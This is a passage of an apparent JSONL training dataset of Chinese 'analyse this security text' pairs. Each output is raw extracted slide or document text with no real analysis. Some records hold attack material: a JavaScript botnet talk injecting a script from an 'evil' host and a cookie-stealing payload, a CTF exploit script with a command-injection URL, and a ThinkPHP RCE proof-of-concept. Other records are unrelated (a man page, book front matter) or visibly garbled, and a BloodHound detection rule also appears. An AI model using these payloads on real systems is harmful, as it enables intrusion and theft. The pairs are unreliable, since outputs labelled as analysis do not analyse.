ATTACKING PERFSONAR PERFSON", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOwning \"bad\" guys {and mafia} with Javascript botnets Chema Alonso & Manu The Sur Lets do a botnet but  We are lazy  We havent money  We havent 0day  We arent the FBI  We arent either:  Google  Apple  Microsoft Let them to be infected Man in the Middle schemas  Intercept communications between client and server  Compromised channel -> Pwned!  Network  ARP Spoofing  Rogue DHCP(6)  ICMPv6 Sppofing  SLAAC Attacks  DNS Spoofing    Evil FOCA Rulez! Man in the Browser  Plugins  BHO  Addons  Access to all data  Passwords  Code  Banking trojans  A russian in my IE JavaScript in the Middle  Poisoning Browser cache  No permanent  Deleting cache means infection cleaned  Cached content is used if not expired  Allows attackers to inject remote javascript  Access to:  Cookies  Not HTTPOnly (more or less)  HTML Code  Form fields  URLs  Code execution   Google Analytics js & malware How to inject JavaScript code  Persistent XSS  Owning HTTP Servers  Network Man In the middle attacks  WiFi  ARP Spoofing  IPv6  Memcache attacks  Imagination - Framework to own bowsers cache - Inject a javascript in each client - That javaScript loads payloads from C&C - http://beefproject.com - Very Well-Known How to create a JavaScript Botnet from the scratch TOR Nodes TOR Nodes Not a Rocket Scince. Buy a bullet-Prof  Not:  The Pirate Bay  Amazon  (Remenber Wikileaks)  Megaupload Configure SQUID Proxy GET / HTTP/1.1 Host: www.web.com GET / HTTP/1.1 Host: www.web.com Response Home.html Response Home.html GET /a.jsp HTTP/1.1 Host: www.web.com GET /a.jsp HTTP/1.1 Host: www.web.com Response a.jsp Response a.Jsp + pasarela.js include http://evil/payload.js GET /payload.js HTTP/1.1 Host: evil Configure SQUID Proxy Squid.conf: Activate URL rewrite program .htaccess: Apache No Expiration Policy Infect all JavaScript files Infect all JavaScript files Publish your Proxy Let Internet do the magic Do Payloads: Cookie stealing document.write( <img id='domaingrabber' src='http://X.X.X.X/panel/ domaingrabber.php?id", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\neject === 用来退出抽取式设备 ## 补充说明 **eject命令** 用来退出抽取式设备若设备已挂入则eject命令会先将该设备卸除再退出 eject允许可移动介质典型是cd-ROM软盘磁带或者JAZ以及zip磁盘在软件控制下弹出该命令也可以控制一些多盘片CD-ROM控制器控制一些设备支持的自动弹出功能以及控制一些CD-ROM驱动器磁盘托盘的关闭与name相应的设备将被弹出name可以为设备文件或者其挂载点也可以为完整路径或者省略前面的/dev或者/mnt设备文件名如果没有指定name缺省使用cdrom 有四种不同的弹出的方法具体要看设备是CD-ROM SCSI设备可移动软盘还是磁带而定默认的弹出会依次尝试所有四种方法直到成功为止如果设备当前是挂载上来的那么在弹出前要先卸载 ### 语法 ```shell eject(选项)(参数) ``` ### 选项 ```shell -a<开关>或--auto<开关>控制设备的自动退出功能 -c<光驱编号>或--changerslut<光驱编号> 选择光驱柜中的光驱 -d或--default显示预设的设备而不是实际执行动作 -f或--floppy退出抽取式磁盘 -h或--help显示帮助 -n或--noop显示指定的设备 -q或--tape退出磁带 -r或--cdrom退出光盘 -s或--scsi以SCSI指令来退出设备 -t或--trayclose关闭光盘的托盘 -v或--verbose执行时显示详细的说明 ``` ### 参数 设备名指定弹出的设备名称", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n强网杯-WP Author:Nu1L Team 强网杯-WP 强网先锋 bank web辅助 主动 侧防 upload baby_crt babymessage Siri Funhash 红方辅助 babynotes Just_a_Galgame 区块链 EasyFake IPFS Misc miscstudy Crypto fault modestudy Web easy_java babewp half_infiltration dice2cry Re aaenc flower safe_m2m firmware_blob imitation_game xx_warmup_obf Pwn direct easyoverflow leak oldschool QWBlogin wingame easypwn 题目名称|working or done|id flag格式为flag{}或者QWB{}或者ctf{} 强网先锋 bank nc 39.101.134.52 8005 web辅助 import string import hashlib import itertools from pwn import * context.log_level = 'debug' io = remote('39.101.134.52', 8005) def passpow(postfix, res): for answer in itertools.product(string.ascii_letters+string.digits, repeat=3): answer = ''.join(answer).encode() hashresult = hashlib.sha256(answer+postfix).hexdigest().encode() if hashresult == res: return answer io.recvuntil(\"+\") postfix = io.recvuntil(\")\")[:-1] io.recvuntil('== ') res = io.recvuntil('\\n')[:-1] print(postfix, res) answer = passpow(postfix, res) print(answer) io.sendlineafter(\":\", answer) io.sendlineafter(\":\", \"icqaf0ecae2322e454ba574617e58ef7\") io.sendlineafter(\":\", \"Q7\") io.sendlineafter(\"> \", \"view records\") records = io.recvuntil(\"your cash\")[:-9].strip().splitlines() print(records) io.sendlineafter(\"> \", \"transact\") io.sendlineafter(\"> \", \"Alice 10\") hsh = io.recvuntil('\\n')[:-1] sender, receiver, amount = hsh[:32], hsh[32:64], hsh[64:] print(hsh) print(sender, receiver, amount) io.sendlineafter(\"> \", \"provide a record\") io.sendlineafter(\"> \", receiver+sender+amount) for record in records[1:]: receiver = record[32:64] amount = record[64:] res = receiver+sender+amount print('res', res) io.sendlineafter(\"> \", \"provide a record\") io.sendlineafter(\"> \", res) io.interactive() 反序列化字符逃逸 主动 http://39.96.23.228:10002/?ip=127.1;cat%20f* 侧防 upload pcap提取出一个上传的jpg根据提示用了steghide和一个密码测一下弱口令123456成功解开拿到 flag baby_crt 题目给出了一个Fault attack on CRT-RSA的场景 爆破t1k求gcd(mf(c1)-f(sig)e%n,n)分解n即可 topsolo::TP=>midsolo::=>invoke=>Gank=>junjle::__tostring http://eci-2ze06zq9b84jbri1qjsz.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA Journey To Protect Points Of Sale Nir Valtman, CISSP W : www.valtman.org . : @ValtmaNir Introduction 2 Photo by Bill Fraser 01/07/2014 3 01/07/2014 4 Im an architect 5 01/07/2014 6 7 Zombies!!! 8 Defacement 9 AntiDef OPEN SOURCE Memory Scraper Secure TDD 10 Why Points Of Sale Targeted? 11 12 13 Deployment 14 15 16 17 18 Payment Application Point Of Sale IS NOT V 20 RAM DB POS Payment Processing Host PA Server Store Payment Processors Data Center PA Client RAM DB RAM DB POS Payment Processing Host PA Server Store Payment Processors Data Center PA Client RAM DB Rest Transit Memory Where Are My Credit Cards? Mobile App Presentation Server Application & Payment Server Payment Processors Data Center Rest Transit Memory Where Are My Credit Cards? Mobile App Presentation Server Application & Payment Server Payment Processors Data Center Token Server Credit Cards Retail Environment Assumptions 100% PCI Compliant Retail Environment Assumptions Retail Environment Assumptions Retail Environment Assumptions Not vulnerable Retail Environment Assumptions Retail Environment Assumptions Cashier  hacker Retail Environment Assumptions Big Brother RATs Remote Administration Tools Routing Threats 37 38 READ&WRITE 39 I AM BOB ME TOO Payment Stages - Authorization 40 PA Processor Issuer Gateway Acquirer Route Track1/2 Transmit Track1/2 POI Transmit Track1/2 Difficult Exploitation Payment Stages - Authorization 41 Payment Stages - Settlement 42 Processor Issuer Gateway Acquirer Transmit Settlement Store & Send PANs PA Server Credit Merchants Account Difficult Exploitation Payment Stages - Settlement 43 44 Memory Scraping Demo 45 46 47 Offline Online VS Bypassed Solutions 49 50 SecureString Class Demo 51 Next Next Next Next Next Generation Firewall 52 ANTI* 53 54 Whitelist MD5 SHA256 Correct Solutions 55 56 Cyber Intelligence 57 I have access to POS terminals in the US, what is the best malware I should use? 58 You need to infect the firmware of the terminal. By doing that, you can get f", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 tabby分析 tabby是做成个springboot项启动为什么这么做暂时不清楚后清楚了便数据库操作 App.class#run() 流程如下判断是否是jdk8然后加载settings配置然后设置配置解析配 置最后基于配置运分析 2 配置件如下 配置分析 3 简单解释下参数 tabby.build.target: 要分析的标可以是个录也可以是个jar包 tabby.build.isJDKProcess: 将jre中的三个jar包也加到target进分析 \"lib/rt.jar\",\"lib/jc e.jar\",\"lib/ext/nashorn.jar\" tabby.build.withAllJDK: 在上述jre是三个jar包之外还会增加jdk的jar包分析共19个jar包 tabby.build.checkFatJar: 这个是因为像项打包成个fatjar时内部可能还有jar包需要进步解析 tabby.build.libraries: 依赖包录 这个是为了让target在解析到依赖包时可以递归依赖解析不会 全量解析默认是只有jre的3个jar包做依赖PS: 如果不设置默认是libs录 tabby.load.enable开启后会动导neo4j如果没开启也不要紧后续再看因为之前jar包都分 析过了就动跳过到导步骤 4 这有两个配置可以注意下 tabby.build.enable 和 tabby.load.enable 如果先进分析不导neo4j tabby.load.enable 可先设置为false分析完后再把 tabby.bui ld.enable 设置为false开启 tabby.load.enable ,只做导什么情况可能会使我已经 成过多个graphdb我需要根据需要导就可以关闭build只load 这个较简单先过下 共两步reset和save reset就是将soot的些属性重置G类是soot的 load分析 tabby/core/Analyser.java#run 5 接着就是save可以看到三步保存到csv然后再保存到neo4j最后清除csv soot/G.java 6 save2CSV将类法关系都保存 关系类型分为以下5种alias(别名)has(类拥有的法)extendcall(法调)interfaces(接) tabby/core/Analyser.java#save() tabby/core/container/DataContainer.java#save2CSV() 7 最终都是通过 @Qquery 注解使默认的hibernate CrudRepository 执查询这样就不依赖 第三数据库来转换存储这可能也是为啥使springboot的理由之吧 接着就是导neo4j tabby/dal/caching/service/RelationshipsService.java#save2CSV() tabby/dal/caching/repository/ClassRepository.java#save2CSV 8 如法导使的 methodService.importMethodRef() ,如下找到对应csv导 src/main/java/tabby/dal/neo4j/repository/MethodRefRepository.java对应如下可以看到是继 承neo4j相关类 Neo4jRepository 然后也是 @Query 来执这样只要配置springboot的 application.yml都不需要配置neo4j的连接执常便的导估计也是因为这使了 springboot PS: 如果需要添加其他法属性就需要改动这块导的语句了 tabby/core/container/DataContainer.java#save2Neo4j 9 最后的buildEdge也就是导各种关系类型 tabby/dal/neo4j/repository/MethodRefRepository.java#loadMethodRefFromCSV 10 最后clean就是删除csv tabby/dal/neo4j/service/ClassService.java 11 如果要做调试查看中间件csv其实只需要保留csv的成即可 这样你就能查看些需要的信息可以来排查吧 先是获取jdk依赖3个还是19个然后收集标jarclass等这判断是否是IS_JDK_ONLY来判断 是收集jdk还是收集指定target录接着添加依赖包 build分析 Java 复制代码 dataContainer.save2CSV(); // dataContainer.save2Neo4j(); // clean(); 1 2 3 12 getT", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n/* * Copyright 2015-2018 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the \"License\"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an \"AS IS\" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package example; import example.users.Password; import example.users.UserManagement; import example.users.Username; import java.util.stream.IntStream; import javax.annotation.PostConstruct; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; import org.springframework.context.annotation.Bean; import org.springframework.data.domain.Pageable; import org.springframework.data.web.config.EnableSpringDataWebSupport; import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder; import org.springframework.security.crypto.password.PasswordEncoder; /** * Central Spring Boot application class to bootstrap the application. Excludes Spring Security auto-configuration as we * don't need it for the example but only want to use a {@link PasswordEncoder} (see {@link #passwordEncoder()}). * <p> * Spring Data web support is transparently activated by Boot for you. In case you want to manually activate it, use * {@link EnableSpringDataWebSupport}. The core aspects of the enabled functionality shown in this example are: * <ol> * <li>Automatic population of a {@link Pageable} instances from request parameters (see * {@link example.users.web.UserController#users(Pageable)})</li> * <li>The ability to use proxy-backed interfaces to bind request payloads (see * ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 常用的元素 ### 块元素(block element) address - 地址 blockquote - 块引用 center - 举中对齐块 dir - 目录列表 div - 常用块级容易也是css layout的主要标签 dl - 定义列表 fieldset - form控制组 form - 交互表单 h1 - 大标题 h2 - 副标题 h3 - 3级标题 h4 - 4级标题 h5 - 5级标题 h6 - 6级标题 hr - 水平分隔线 isindex - input prompt menu - 菜单列表 noframes - frames可选内容对于不支持frame的浏览器显示此区块内容 noscript - 可选脚本内容对于不支持script的浏览器显示此内容 ol - 排序表单 p - 段落 pre - 格式化文本 table - 表格 ul - 非排序列表", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Thinkphp5 5.0.22/5.1.29 Remote Code Execution Vulnerability [中文版本(Chinese version)](README.zh-cn.md) ThinkPHP is an extremely widely used PHP development framework in China. In its version 5, as the framework processes controller name incorrectly, it can execute any method if the website doesn't have mandatory routing enabled (which is default), resulting in a RCE vulnerability. Reference links - http://www.thinkphp.cn/topic/60400.html - http://www.thinkphp.cn/topic/60390.html - https://xz.aliyun.com/t/3570 ## Environment Setup Enter the following command(ThinkPHP version:5.0.20) ``` docker compose up -d ``` Visit `http://your-ip:8080` and you'll see the default page of ThinkPHP. ## POC Directly visit `http://your-ip:8080/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1` and it'll execute the phpinfo ![](1.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1049/1069-bloodhound使用 ## 来自ATT&CK的描述 T1049:攻击者可能会通过查询网络上的信息来尝试获取与他们当前正在访问的受感染系统之间或从远程系统获得的网络连接的列表 T1069:攻击者可能会尝试查找本地系统或域级别的组和权限设置 ## 测试案例 BloodHound是一种单页的JavaScript的Web应用程序构建在Linkurious上用Electron编译NEO4J数据库是PowerShell/C# ingesto BloodHound使用可视化图来显示Active Directory环境中隐藏的和相关联的主机内容攻击者可以使用BloodHound轻松识别高度复杂的攻击路径否则很难快速识别防御者可以使用BloodHound来识别和防御那些相同的攻击路径蓝队和红队都可以使用BloodHound轻松深入了解Active Directory环境中的权限关系 ## 检测日志 windows 安全日志 ## 测试复现 ```dos SharpHound.exe -c ALL ``` ## 测试留痕 windows安全日志5145 ## 检测规则/思路 ### sigma规则 ```yml title: Bloodhound and Sharphound Hack Tool description: Detects command line parameters used by Bloodhound and Sharphound hack tools references: - https://github.com/BloodHoundAD/BloodHound - https://github.com/BloodHoundAD/SharpHound tags: - attack.discovery - attack.t1049 logsource: category: process_creation product: windows detection: selection1: Image|contains: - '\\Bloodhound.exe' - '\\SharpHound.exe' selection2: CommandLine|contains: - ' -CollectionMethod All ' - '.exe -c All -d ' - 'Invoke-Bloodhound' - 'Get-BloodHoundData' selection3: CommandLine|contains|all: - ' -JsonFolder ' - ' -ZipFileName ' selection4: CommandLine|contains|all: - ' DCOnly ' - ' --NoSaveCache ' condition: 1 of them falsepositives: - Other programs that use these command line option and accepts an 'All' parameter level: high ``` ### 建议 基于进程命令名称进行检测准确率极低谨慎使用检测条件1. ## 参考推荐 MITRE-ATT&CK-T1049 <https://attack.mitre.org/techniques/T1049/> MITRE-ATT&CK-T1069 <https://attack.mitre.org/techniques/T1069/> bloodhound <https://github.com/BloodHoundAD/BloodHound> 域分析神器 <https://www.cnblogs.com/KevinGeorge/p/10513211.html>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 gnunet presentation for DC10 by  not disclosed due to DMCA  2 gnunet Requirements  Anonymity  Confidentiality  Deniability  Accountability  Efficiency 3 Applications  anonymous sharing of medical histories  distributed backups of important data  ad-hoc communication between small devices  and others 4 Infrastructure We call gnunet a network because:  file-sharing is just one possible application  most components can be re-used for other applications:  authentication  discovery  encrypted channels  accounting  the protocol is extensible and extentions are planned 5 Related Work Network Gnutella[1, 4] Chord[24] Freenet[9] MojoNation[17] Search bf-search compute df-search broker Anonymous no no yes no Accounting no no no yes File-Sharing direct migrated insert insert Chord[24], Publius[15], Tangler[16], CAN[19] and Pastry[21, 7] are equivalent from the point of view of this discussion. 6 Outline of the Talk 1. Encoding data for gnunet 2. Searching in gnunet 3. Anonymity in gnunet 4. Accounting in gnunet 7 Encoding in gnunet  Requirements  Trees  Blocks  Limitations  Benefits 8 Problems with existing Systems  Content submitted in plaintext, or  content must be inserted into the network and is then stored twice, in plaintext by the originator and encrypted by the network (e.g. Freenet[9]);  in some systems, independent insertions of the same file results in different copies in the network (e.g. Publius[15]) 9 Encoding data for gnunet: Requirements  intermediaries can not find out content or queries  hosts can send replies to queries and deny knowing what the query or the content was for  keep storage requirements (and bandwidth) small 10 Tree Encoding Files in gnunet are split into 1k blocks for the transport[6]: IBlock: indirection node containing hashes of child node data H(H(Keyword)) Filenames RBlock: Contains file information, description, and hashcode root indirection node. IBlock (Root): Like other indirection blocks, this contains the hashes of its child nodes. DBlock ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThis document and its content is the property of Airbus Defence and Space. It shall not be communicated to any third party without the owners written consent | [Airbus Defence and Space Company name]. All rights reserved. Auditing 6LoWPAN networks Using Standard Penetration Testing Tools Adam Reziouk Arnaud Lebrun Jonathan-Christofer Demay 2 Arnaud Lebrun Jonathan-Christofer Demay CANSPY A Platform for Auditing CAN Devices The 6LoWPAN protocol  IPv6 over Low power Wireless Personal Area Networks  Header compression flags  Addresses factoring (IID or predefined)  Predefined values (e.g., TTL)  Fields omission (when unused)  Use of contexts (index-based)  UDP header compression (ports and checksum)  Packet fragmentation  MTU 127 bytes Vs 1500 bytes  80 bytes of effective payload 3 Arnaud Lebrun Jonathan-Christofer Demay CANSPY A Platform for Auditing CAN Devices Whats the big deal ? 4 Arnaud Lebrun Jonathan-Christofer Demay CANSPY A Platform for Auditing CAN Devices The IEEE 802.15.4 standard  PHY layer and MAC sublayer  Multiple possible configurations  Network topology  Data transfer model  Multiple security suites  Integrity, Confidentiality or both  Encryption key size (32, 64 or 128)  Multiple standard revision  2003  2006 and 2011 5 Arnaud Lebrun Jonathan-Christofer Demay CANSPY A Platform for Auditing CAN Devices Deviations for the standard 6 Arnaud Lebrun Jonathan-Christofer Demay CANSPY A Platform for Auditing CAN Devices The ARSEN project  Advanced Routing between 6LoWPAN and Ethernet Networks  Detect the configuration of existing 802.15.4 infrastructure  Network topology  Data transfer model  Security suite  Standard revision  Standard deviations  Handle packet translation  Compression/decompression  Fragmentation/defragmentation  Support all possible IEEE 802.15.4 configurations 7 Arnaud Lebrun Jonathan-Christofer Demay CANSPY A Platform for Auditing CAN Devices Based on Scapy-radio 8 Arnaud Lebrun Jonathan-Christofer Demay CANSPY A Platform for Auditing C", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTHE BLUETOOTH DEVICE DATABASE Ryan Holeman twitter: @hackgnar Sunday, July 7, 13 OVERVIEW  Collect BT devices Sunday, July 7, 13 WHY?  Curiosity  Awareness  Provide open data sets  Provide collection tools Sunday, July 7, 13 WHAT?  Data  Device geolocation  BT address  BT device names  BT meta data Sunday, July 7, 13 HOW?  Clients  ios, osx, linux, etc  Servers  bluetoothdatabase.com  DIY Sunday, July 7, 13 WHO?  Open Source  bnap bnap  hackfromacave  Proprietary  geolocation vendors  others... Sunday, July 7, 13 CURIOSITY  Whats out there?  What moves?  Prevalence?  Reoccurrence? Sunday, July 7, 13 WHATS OUT THERE  Over 10,000 sightings 2,489 9,362 Sightings unique sightings duplicate sightings Sunday, July 7, 13 MOVEMENT  Device movement estimations for devices seen more than once. 21% 39% 24% 9% 5% 2% 5 km 1 km 0.5 km 0.1 km 0.05 km stationary Sunday, July 7, 13 PREVALENCE  Most common devices by name.  Generic names were removed Roku Player DTVBluetooth BlackBerry 9930 BlackBerry 9900 BSA IdleTV SGH-T379 BlackBerry 9810 BlackBerry 9360 TVBluetooth 0 23 45 68 90 Sunday, July 7, 13 AWARENESS  Your devices  Bugs  Hidden functionality?  Security  Anonymity Sunday, July 7, 13 YOU  Participation  bluetoothdatabase.com/participation  Tools  github.com/hackgnar/bluetoothdatabase  Data  bluetoothdatabase.com/data Sunday, July 7, 13 COMING SOON  Ubertooth Client  gps + ubertooth Sunday, July 7, 13 END - Twitter: @hackgnar - Web: hackgnar.com Sunday, July 7, 13", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nmacOS/iOS Kernel Debugging and Heap Feng Shui Min(Spark) Zheng @ Alibaba Mobile Security Outline Alibaba Security  Introduction  macOS Two Machine Debugging  iOS Kernel Debugging  Debugging Mach_voucher Heap Overflow  Traditional Heap Feng Shui  Port Feng Shui  Conclusion Whoami  Min(Spark) Zheng @ Twitter蒸米spark @ Weibo  Security Expert @ Alibaba  CUHK PhD, Blue-lotus and Insight-labs  Worked in FireEye, Baidu and Tencent  Focus on Android / iOS system security Alibaba Security  Co-author: Xiangyu Liu, Security Engineer @ Alibaba  Special thanks to: yang dian, aimin pan, jingle, qwertyoruiop, windknown, liangchen, qoobee, etc. Introduction of macOS/iOS Kernel  XNU is the computer operating system kernel developed at Apple Inc. for use in the iOS/macOS operating system and released as free and open-source software as part of the Darwin operating system. XNU is an abbreviation of X is Not Unix.  XNU for macOS is open source. It can be compiled and debugged.  XNU for iOS is not open source. It can not be compiled and debugged (officially). But most of implementation is same as macOS. Alibaba Security Outline Alibaba Security  Introduction  macOS Two Machine Debugging  iOS Kernel Debugging  Debugging Mach_voucher Heap Overflow  Traditional Heap Feng Shui  Port Feng Shui  Conclusion Two-machine Debugging of macOS  To do a good job, one must first sharpen one's tools.  Machine: two MacBook or one MacBook with VM (The system versions can be different).  Equipments for two-machine debugging: Thunderbolt to FireWire * 2, Belkin FireWire 800 9/9-Pin cable * 1, Thunderbolt 3 (USB-C) to Thunderbolt 2 * 2 for new 2016 MacBook. Alibaba Security Two-machine Debugging of macOS  Two MacBook needs to install KDK (Kernel Debug Kit).  After connection with FireWare cable, execute fwkdp on the host MacBook.  Copy the kernel.development of KDK to the System/Library/Kernels/ folder on the debug MacBook and then execute the following command: sudo nvram boot-args =debug=0x147 kdp_match_na", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nChristian Nagel Professional C# 6 and .NET Core 1.0 EISBN: 978-1-119-09660-3 Copyright  2016 by John Wiley & Sons, Inc. All Rights Reserved. This translation published under license. Trademarks: Wiley, the Wiley logo, Wrox, the Wrox logo, Programmer to Programmer, and related trade dress are trademarks or registered trademarks of John Wiley & Sons, Inc. and/or its affiliates, in the United States and other countries, and may not be used without written permission. All other trademarks are the property of their respective owners. John Wiley & Sons, Inc., is not associated with any product or vendor mentioned in this book. 本书中文简体字版由Wiley Publishing, Inc授权清华大学出版社出版未经出版者书面许 可不得以任何方式复制或抄袭本书内容 北京市版权局著作权合同登记号 图字01-2016-5204 Copies of this book sold without a Wiley sticker on the cover are unauthorized and illegal. 本书封面贴有Wiley公司防伪标签无标签者不得销售 版权所有侵权必究侵权举报电话010-62782989 13701121933 图书在版编目CIP数据 C#高级编程第10版C# 6 & .NET Core 1.0美克里斯琴内格尔Christian Nagel 著李铭 译北京清华大学出版社2017 .NET开发经典名著 书名原文Professional C# 6.0 and .NET Core 1.0 ISBN 978-7-302-46196-8 Ⅰ①C Ⅱ①克 ②李 Ⅲ①C语言程序设计 ②计算机网络程序设计 Ⅳ①TP312C②TP393 中国版本图书馆CIP数据核字2017第019996号 责任编辑 王 军 于 平 装帧设计 牛静敏 责任校对 成凤进 责任印制 杨 艳 出版发行 清华大学出版社 网 址 http://www.tup.com.cn, http://www.wqbook.com 地 址 北京清华大学学研大厦A座 邮 编 100084 社 总 机 010-62770175 邮 购 010-62786544 投稿与读者服务 010-62776969, c-service@tup.tsinghua.edu.cn 质量反馈 010-62772015, zhiliang@tup.tsinghua.edu.cn 印 装 者 三河市中晟雅豪印务有限公司 经 销 全国新华书店 开 本 185mm260mm 印 张 92.5 插 页 1 字 数 2482千字 版 次 2017年3月第1版 印 次 2017年3月第1次印刷 印 数 15000 定 价 168.00元 产品编号067811-01 译者序 C#是微软公司在2000年6月发布的一种新的编程语言由Delphi语言的设计者 Hejlsberg带领微软公司的开发团队开发是一种安全的稳定的简单的优雅的由C 和C++衍生出来的面向对象的编程语言它在继承C和C++强大功能的同时去掉了它们 的一些复杂特性例如没有宏以及不允许多重继承C#综合了Visual Basic简单的可视 化操作和C++的高运行效率以其强大的操作能力优雅的语法风格创新的语言特性和 便捷的面向组件编程支持成为.NET开发的首选语言 自.NET推出以来大约每两年就推出一个新的主要版本从.NET Core的特性可以看 出自.NET第1版以来这个技术在.NET历史上给.NET带来的变化最大  .NET Framework要求把开发过程中使用的.NET运行库版本安装到目标系统上而 在.NET Core 1.0中框架包括运行库是与应用程序一起交付的即使更新运 行库也不影响现有的应用程序  Visual Studio 2013附带着C# 5和.NET Framework 4.5.NET Framework 4.5很大有 2", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCloud Computing A Weapon of Mass Destruction? David M. N. Bryan - CISSP  Technology Enthusiast (Aka Hacker or VideoMan)  Security Consultant (Other Company)  dave@drstrangelove.net  PGP Key on key servers Michael Anderson - Newb  Security Consultant (NetSPI)  michael.anderson@netspi. com  cpt.fury@gmail.com NetSPI  Founded in 2001  Exclusive Focus: Information Security Consulting  Security & compliance assessments, security program development  Vendor neutral  services only  PCI QSA, ASV, and PA-QSA Certifications  Government Clearances  Industry Focus:  Retail / payment apps  Financial services  Healthcare  Energy & Power What is the Cloud What can I do in the cloud? Whats required to start? Cloud Computing?  Is it a useful tool?  Or a WMD? Cloud Computing WMD  Outline  Threat Agents  Who and why?  Attacks  Command and Control  Attack Types  Results  Defenses  Incident Response Threat Agents  Who are they?  Business Rivals  Organized Crime  Foreign Powers Motivates  What do they want?  Bragging Rights  Money  Power Power Terms  DDoS  Distributed Denial of Service Attack  Fragmentation Attack  TCP Syn Flood  Sending packets with only the Syn bit set, and not listening for a response Typical Command And Control  Who is your herder?  Typical CNC  Herder  Controller or Scripts  Bots  Infected Clients  Lots of Hosts (Millions?)  Requires lots of time  Most systems are Windows Command And Control Thunder Clap  Its a proof of concept  Run DDoS attacks from the cloud  Can use social media as herder  Rapid deployment and ramp up of systems New Command And Control  Who is your herder?  Cloud is Herder and Botnet  Bandwidth is plentiful  Less dispersed  Little prep time  Control of attack  Social Media  Anonymous  Hard to track Command And Control Attack Types  TCP Full Connection  Could be less effective; not stealthy  Packet Fragmentation  Not implemented in proof-of- concept  TCP Syn Flood  Dangerous, but requires some serious bandwidth What can we do with this?  Target a ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAndrea Marcelli (@_S0nn1_) Twitter Email Web PhD Student Security Researcher The signature generation problem The algorithm Introducing YaYaGen Demo A unique pattern Syntactic signatures * this is where the most of the existing tools and researches focus on Semantic signatures Android malware Reduce Automate 100% recall Save YARA is to files what Snort is to network traffic de-facto standard syntactic signatures Semantic signatures rule YaYaSyringe { meta: author = \"DEF CON 26\" strings: $a = text here $b = { E2 34 A1 C8 23 FB } condition: $a and $b and androguard.filter(\"action.BATTERYCHECK\") and androguard.number_of_services == 3  } APK Unsupervised Automatic Each block is an attribute extracted through the analysis quality of the analysis static dynamic url: malware.xxx permission: ACCESS_FINE_LOCATION Sample 1 Sample 2 = Signature Sample 1 Sample 2 Sample 3 Sample 4 Sample 5 Sample 6 Sample 7 Sample 8 Sample 9 Sample 10 Sample 11 Sample 12 dynamic greedy algorithm + + + + clause literal DNF clause weighed is the lowest weighting system higher the weight, the less FP lower the weight, the more FP TMIN TMAX over-specific Basic optimizer Evo optimizer TMAX Raw Optimized From application analysis reports YARA rules to 2 algorithms 2 optimizers heuristics YARA rule parser FP exclusion Koodous Rule Name Original YaYaGen Improvement 1,004 +86.3% 315 +43.2% 257 +89.0% 652 +16.6% 172 +8.2% 430 +131.2% perform better 100 apps is less 5 minutes", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFerdinand Schober  Historical Development  Vintage Protection  Different DRM approaches  Privacy Study  Failure Cases  Case Studies  Messing with a gamer  Case Study  Why are games cracked?  Q&A Disc Layout Protection Games distributed on floppy disc Easy to duplicate Use Unique disc layout E.g. change sector/track markings Requires custom reading method Failure prevents loading Broken through nibble copy Feelies Use external token to confirm ownership E.g. physical dongle Failure prevents launching Broken through game code modification Use user-based challenge/response E.g. code wheel, handbook, etc Failure stops game/changes behavior Broken through (over time much less) painstaking token duplication  Could be nice game add-ons  Effective as long as token is hard to copy  Now outdated due to easy digitalization & Internet CD Layout Protection  Games distributed on CDs  Same old problems  Break Red Book standard  Broken sectors, oversized disc  Prevents standard copy procedure  Failure prevents loading  Broken through error-resilient hardware, advanced nibble copy Registration Key  Use of key value to confirm ownership  Derived through cryptographic algorithm  Required for installation, multiplayer features  Broken through reverse- engineering, online databases  Still the first defense Code Obfuscation All copy protection is useless if game code can be changed Obfuscate binaries Pre-2000 mostly custom solutions Post-2000 added as middleware (system components) De-obfuscation & patch possible (cracks) Networked DRM Cracks are surprisingly effective Combine disc layout, registration key, code obfuscation Added online registration requirement, often limits number of installs Can still be removed, but raises the bar Social DRM Eliminates physical distribution, downloads only Content protection built-in Adds: user identity payment information social network online requirement DLC Additional game content for purchase Tied to game registration and user account Obfuscation ", "category": 